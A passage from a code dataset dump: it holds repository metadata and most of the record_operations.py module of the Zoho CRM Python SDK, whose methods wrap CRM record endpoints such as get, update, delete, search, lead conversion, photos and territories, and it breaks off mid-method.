return dice(5, 20) + self.extra_dmg
| 22.904762
| 51
| 0.519751
| 773
| 7,215
| 4.364812
| 0.086675
| 0.085359
| 0.149378
| 0.090694
| 0.812982
| 0.792235
| 0.777416
| 0.771191
| 0.704209
| 0.704209
| 0
| 0.033362
| 0.356064
| 7,215
| 314
| 52
| 22.977707
| 0.692854
| 0
| 0
| 0.738462
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.138462
| false
| 0
| 0.007692
| 0.069231
| 0.284615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
09e0ed10ea9c046e6ad0c6ef69fe5a8bfe28f486
| 49,696
|
py
|
Python
|
zcrmsdk/src/com/zoho/crm/api/record/record_operations.py
|
zoho/zohocrm-python-sdk-2.1
|
cde6fcd1c5c8f7a572154ebb2b947ec697c24209
|
[
"Apache-2.0"
] | null | null | null |
zcrmsdk/src/com/zoho/crm/api/record/record_operations.py
|
zoho/zohocrm-python-sdk-2.1
|
cde6fcd1c5c8f7a572154ebb2b947ec697c24209
|
[
"Apache-2.0"
] | null | null | null |
zcrmsdk/src/com/zoho/crm/api/record/record_operations.py
|
zoho/zohocrm-python-sdk-2.1
|
cde6fcd1c5c8f7a572154ebb2b947ec697c24209
|
[
"Apache-2.0"
] | null | null | null |
try:
from zcrmsdk.src.com.zoho.crm.api.exception import SDKException
from zcrmsdk.src.com.zoho.crm.api.parameter_map import ParameterMap
from zcrmsdk.src.com.zoho.crm.api.util import APIResponse, CommonAPIHandler, Utility, Constants
from zcrmsdk.src.com.zoho.crm.api.param import Param
from zcrmsdk.src.com.zoho.crm.api.header import Header
from zcrmsdk.src.com.zoho.crm.api.header_map import HeaderMap
except Exception:
from ..exception import SDKException
from ..parameter_map import ParameterMap
from ..util import APIResponse, CommonAPIHandler, Utility, Constants
from ..param import Param
from ..header import Header
from ..header_map import HeaderMap
class RecordOperations(object):
def __init__(self):
"""Creates an instance of RecordOperations"""
pass
def get_record(self, id, module_api_name, param_instance=None, header_instance=None):
"""
The method to get record
Parameters:
id (int) : An int representing the id
module_api_name (string) : A string representing the module_api_name
param_instance (ParameterMap) : An instance of ParameterMap
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(id, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: id EXPECTED TYPE: int', None, None)
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if param_instance is not None and not isinstance(param_instance, ParameterMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: param_instance EXPECTED TYPE: ParameterMap', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/'
api_path = api_path + str(id)
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_GET)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_READ)
handler_instance.set_param(param_instance)
handler_instance.set_header(header_instance)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.response_handler import ResponseHandler
except Exception:
from .response_handler import ResponseHandler
return handler_instance.api_call(ResponseHandler.__module__, 'application/json')
def update_record(self, id, module_api_name, request, header_instance=None):
"""
The method to update record
Parameters:
id (int) : An int representing the id
module_api_name (string) : A string representing the module_api_name
request (BodyWrapper) : An instance of BodyWrapper
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.body_wrapper import BodyWrapper
except Exception:
from .body_wrapper import BodyWrapper
if not isinstance(id, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: id EXPECTED TYPE: int', None, None)
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if request is not None and not isinstance(request, BodyWrapper):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: BodyWrapper', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/'
api_path = api_path + str(id)
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_PUT)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_UPDATE)
handler_instance.set_content_type('application/json')
handler_instance.set_request(request)
handler_instance.set_header(header_instance)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
except Exception:
from .action_handler import ActionHandler
return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def delete_record(self, id, module_api_name, param_instance=None, header_instance=None):
"""
The method to delete record
Parameters:
id (int) : An int representing the id
module_api_name (string) : A string representing the module_api_name
param_instance (ParameterMap) : An instance of ParameterMap
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(id, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: id EXPECTED TYPE: int', None, None)
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if param_instance is not None and not isinstance(param_instance, ParameterMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: param_instance EXPECTED TYPE: ParameterMap', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/'
api_path = api_path + str(id)
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_DELETE)
handler_instance.set_category_method(Constants.REQUEST_METHOD_DELETE)
handler_instance.set_param(param_instance)
handler_instance.set_header(header_instance)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
except Exception:
from .action_handler import ActionHandler
return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def get_records(self, module_api_name, param_instance=None, header_instance=None):
"""
The method to get records
Parameters:
module_api_name (string) : A string representing the module_api_name
param_instance (ParameterMap) : An instance of ParameterMap
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if param_instance is not None and not isinstance(param_instance, ParameterMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: param_instance EXPECTED TYPE: ParameterMap', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_GET)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_READ)
handler_instance.set_param(param_instance)
handler_instance.set_header(header_instance)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.response_handler import ResponseHandler
except Exception:
from .response_handler import ResponseHandler
return handler_instance.api_call(ResponseHandler.__module__, 'application/json')
def create_records(self, module_api_name, request, header_instance=None):
"""
The method to create records
Parameters:
module_api_name (string) : A string representing the module_api_name
request (BodyWrapper) : An instance of BodyWrapper
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.body_wrapper import BodyWrapper
except Exception:
from .body_wrapper import BodyWrapper
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if request is not None and not isinstance(request, BodyWrapper):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: BodyWrapper', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_POST)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_CREATE)
handler_instance.set_content_type('application/json')
handler_instance.set_request(request)
handler_instance.set_header(header_instance)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
except Exception:
from .action_handler import ActionHandler
return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def update_records(self, module_api_name, request, header_instance=None):
"""
The method to update records
Parameters:
module_api_name (string) : A string representing the module_api_name
request (BodyWrapper) : An instance of BodyWrapper
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.body_wrapper import BodyWrapper
except Exception:
from .body_wrapper import BodyWrapper
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if request is not None and not isinstance(request, BodyWrapper):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: BodyWrapper', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_PUT)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_UPDATE)
handler_instance.set_content_type('application/json')
handler_instance.set_request(request)
handler_instance.set_header(header_instance)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
except Exception:
from .action_handler import ActionHandler
return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def delete_records(self, module_api_name, param_instance=None, header_instance=None):
"""
The method to delete records
Parameters:
module_api_name (string) : A string representing the module_api_name
param_instance (ParameterMap) : An instance of ParameterMap
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if param_instance is not None and not isinstance(param_instance, ParameterMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: param_instance EXPECTED TYPE: ParameterMap', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_DELETE)
handler_instance.set_category_method(Constants.REQUEST_METHOD_DELETE)
handler_instance.set_param(param_instance)
handler_instance.set_header(header_instance)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
except Exception:
from .action_handler import ActionHandler
return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def upsert_records(self, module_api_name, request, header_instance=None):
"""
The method to upsert records
Parameters:
module_api_name (string) : A string representing the module_api_name
request (BodyWrapper) : An instance of BodyWrapper
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.body_wrapper import BodyWrapper
except Exception:
from .body_wrapper import BodyWrapper
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if request is not None and not isinstance(request, BodyWrapper):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: BodyWrapper', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/upsert'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_POST)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_ACTION)
handler_instance.set_content_type('application/json')
handler_instance.set_request(request)
handler_instance.set_header(header_instance)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
except Exception:
from .action_handler import ActionHandler
return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def get_deleted_records(self, module_api_name, param_instance=None, header_instance=None):
"""
The method to get deleted records
Parameters:
module_api_name (string) : A string representing the module_api_name
param_instance (ParameterMap) : An instance of ParameterMap
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if param_instance is not None and not isinstance(param_instance, ParameterMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: param_instance EXPECTED TYPE: ParameterMap', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/deleted'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_GET)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_READ)
handler_instance.set_param(param_instance)
handler_instance.set_header(header_instance)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.deleted_records_handler import DeletedRecordsHandler
except Exception:
from .deleted_records_handler import DeletedRecordsHandler
return handler_instance.api_call(DeletedRecordsHandler.__module__, 'application/json')
def search_records(self, module_api_name, param_instance=None, header_instance=None):
"""
The method to search records
Parameters:
module_api_name (string) : A string representing the module_api_name
param_instance (ParameterMap) : An instance of ParameterMap
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if param_instance is not None and not isinstance(param_instance, ParameterMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: param_instance EXPECTED TYPE: ParameterMap', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/search'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_GET)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_READ)
handler_instance.set_param(param_instance)
handler_instance.set_header(header_instance)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.response_handler import ResponseHandler
except Exception:
from .response_handler import ResponseHandler
return handler_instance.api_call(ResponseHandler.__module__, 'application/json')
def convert_lead(self, id, request):
"""
The method to convert lead
Parameters:
id (int) : An int representing the id
request (ConvertBodyWrapper) : An instance of ConvertBodyWrapper
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.convert_body_wrapper import ConvertBodyWrapper
except Exception:
from .convert_body_wrapper import ConvertBodyWrapper
if not isinstance(id, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: id EXPECTED TYPE: int', None, None)
if request is not None and not isinstance(request, ConvertBodyWrapper):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: ConvertBodyWrapper', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/Leads/'
api_path = api_path + str(id)
api_path = api_path + '/actions/convert'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_POST)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_CREATE)
handler_instance.set_content_type('application/json')
handler_instance.set_request(request)
handler_instance.set_mandatory_checker(True)
Utility.get_fields("Deals", handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.convert_action_handler import ConvertActionHandler
except Exception:
from .convert_action_handler import ConvertActionHandler
return handler_instance.api_call(ConvertActionHandler.__module__, 'application/json')
def get_photo(self, id, module_api_name):
"""
The method to get photo
Parameters:
id (int) : An int representing the id
module_api_name (string) : A string representing the module_api_name
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(id, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: id EXPECTED TYPE: int', None, None)
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/'
api_path = api_path + str(id)
api_path = api_path + '/photo'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_GET)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_READ)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.download_handler import DownloadHandler
except Exception:
from .download_handler import DownloadHandler
return handler_instance.api_call(DownloadHandler.__module__, 'application/x-download')
def upload_photo(self, id, module_api_name, request):
"""
The method to upload photo
Parameters:
id (int) : An int representing the id
module_api_name (string) : A string representing the module_api_name
request (FileBodyWrapper) : An instance of FileBodyWrapper
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.file_body_wrapper import FileBodyWrapper
except Exception:
from .file_body_wrapper import FileBodyWrapper
if not isinstance(id, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: id EXPECTED TYPE: int', None, None)
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if request is not None and not isinstance(request, FileBodyWrapper):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: FileBodyWrapper', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/'
api_path = api_path + str(id)
api_path = api_path + '/photo'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_POST)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_CREATE)
handler_instance.set_content_type('multipart/form-data')
handler_instance.set_request(request)
handler_instance.set_mandatory_checker(True)
Utility.get_fields(module_api_name, handler_instance)
Utility.verify_photo_support(module_api_name)
try:
from zcrmsdk.src.com.zoho.crm.api.record.file_handler import FileHandler
except Exception:
from .file_handler import FileHandler
return handler_instance.api_call(FileHandler.__module__, 'application/json')
def delete_photo(self, id, module_api_name):
"""
The method to delete photo
Parameters:
id (int) : An int representing the id
module_api_name (string) : A string representing the module_api_name
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(id, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: id EXPECTED TYPE: int', None, None)
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/'
api_path = api_path + str(id)
api_path = api_path + '/photo'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_DELETE)
handler_instance.set_category_method(Constants.REQUEST_METHOD_DELETE)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.file_handler import FileHandler
except Exception:
from .file_handler import FileHandler
return handler_instance.api_call(FileHandler.__module__, 'application/json')
def mass_update_records(self, module_api_name, request):
"""
The method to mass update records
Parameters:
module_api_name (string) : A string representing the module_api_name
request (MassUpdateBodyWrapper) : An instance of MassUpdateBodyWrapper
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.mass_update_body_wrapper import MassUpdateBodyWrapper
except Exception:
from .mass_update_body_wrapper import MassUpdateBodyWrapper
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if request is not None and not isinstance(request, MassUpdateBodyWrapper):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: MassUpdateBodyWrapper', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/actions/mass_update'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_POST)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_UPDATE)
handler_instance.set_content_type('application/json')
handler_instance.set_request(request)
handler_instance.set_mandatory_checker(True)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.mass_update_action_handler import MassUpdateActionHandler
except Exception:
from .mass_update_action_handler import MassUpdateActionHandler
return handler_instance.api_call(MassUpdateActionHandler.__module__, 'application/json')
def get_mass_update_status(self, module_api_name, param_instance=None):
"""
The method to get mass update status
Parameters:
module_api_name (string) : A string representing the module_api_name
param_instance (ParameterMap) : An instance of ParameterMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if param_instance is not None and not isinstance(param_instance, ParameterMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: param_instance EXPECTED TYPE: ParameterMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/actions/mass_update'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_GET)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_READ)
handler_instance.set_param(param_instance)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.mass_update_response_handler import MassUpdateResponseHandler
except Exception:
from .mass_update_response_handler import MassUpdateResponseHandler
return handler_instance.api_call(MassUpdateResponseHandler.__module__, 'application/json')
def assign_territories_to_multiple_records(self, module_api_name, request):
"""
The method to assign territories to multiple records
Parameters:
module_api_name (string) : A string representing the module_api_name
request (BodyWrapper) : An instance of BodyWrapper
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.body_wrapper import BodyWrapper
except Exception:
from .body_wrapper import BodyWrapper
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if request is not None and not isinstance(request, BodyWrapper):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: BodyWrapper', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/actions/assign_territories'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_POST)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_UPDATE)
handler_instance.set_content_type('application/json')
handler_instance.set_request(request)
handler_instance.set_mandatory_checker(True)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
except Exception:
from .action_handler import ActionHandler
return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def assign_territory_to_record(self, module_api_name, id, request):
"""
The method to assign territory to record
Parameters:
module_api_name (string) : A string representing the module_api_name
id (int) : An int representing the id
request (BodyWrapper) : An instance of BodyWrapper
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.body_wrapper import BodyWrapper
except Exception:
from .body_wrapper import BodyWrapper
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if not isinstance(id, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: id EXPECTED TYPE: int', None, None)
if request is not None and not isinstance(request, BodyWrapper):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: BodyWrapper', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/'
api_path = api_path + str(id)
api_path = api_path + '/actions/assign_territories'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_POST)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_UPDATE)
handler_instance.set_content_type('application/json')
handler_instance.set_request(request)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
except Exception:
from .action_handler import ActionHandler
return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def remove_territories_from_multiple_records(self, module_api_name, request):
"""
The method to remove territories from multiple records
Parameters:
module_api_name (string) : A string representing the module_api_name
request (BodyWrapper) : An instance of BodyWrapper
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.body_wrapper import BodyWrapper
except Exception:
from .body_wrapper import BodyWrapper
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if request is not None and not isinstance(request, BodyWrapper):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: BodyWrapper', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/actions/remove_territories'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_POST)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_UPDATE)
handler_instance.set_content_type('application/json')
handler_instance.set_request(request)
handler_instance.set_mandatory_checker(True)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
except Exception:
from .action_handler import ActionHandler
return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def remove_territories_from_record(self, module_api_name, id, request):
"""
The method to remove territories from record
Parameters:
module_api_name (string) : A string representing the module_api_name
id (int) : An int representing the id
request (BodyWrapper) : An instance of BodyWrapper
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.body_wrapper import BodyWrapper
except Exception:
from .body_wrapper import BodyWrapper
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if not isinstance(id, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: id EXPECTED TYPE: int', None, None)
if request is not None and not isinstance(request, BodyWrapper):
